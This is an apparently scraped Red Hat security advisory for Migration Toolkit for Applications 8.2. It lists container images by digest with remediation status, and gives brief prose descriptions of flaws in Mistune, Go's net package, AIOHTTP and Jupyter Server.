| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in Mistune, a Markdown parser. This vulnerability, known as Regular Expression Denial of Service (ReDoS), exists in the `LINK_TITLE_RE` regular expression. A remote attacker can exploit this by providing specially crafted Markdown input, which causes the regular expression engine to engage in catastrophic backtracking. This leads to significant CPU consumption, making applications that use Mistune unresponsive and resulting in a Denial of Service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in the `net` package of Go (golang), specifically when using the `LookupCNAME` function with the `cgo` DNS resolver. A remote attacker could exploit this by providing a very long Canonical Name (CNAME) response. This can trigger a double-free of C memory, leading to a crash and a Denial of Service (DoS) for the affected application.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in AIOHTTP, an asynchronous HTTP client/server framework for asyncio and Python. An attacker could exploit this vulnerability by providing untrusted input to the `CookieJar.load()` function. This could potentially lead to arbitrary code execution, allowing the attacker to run malicious code on the affected system. This issue is most likely to occur in applications that allow attacker-controlled files to be loaded.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in Jupyter Server. An authenticated user can exploit a path traversal vulnerability in the REST API to escape the configured root directory (`root_dir`). By crafting a request to the `/api/contents` endpoint with encoded path components, an attacker can gain access to sibling directories whose names begin with the same prefix as the `root_dir`. This allows the attacker to read, write, and delete files in these accessible sibling directories, potentially leading to unauthorized data access and modification, especially in multi-tenant environments.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
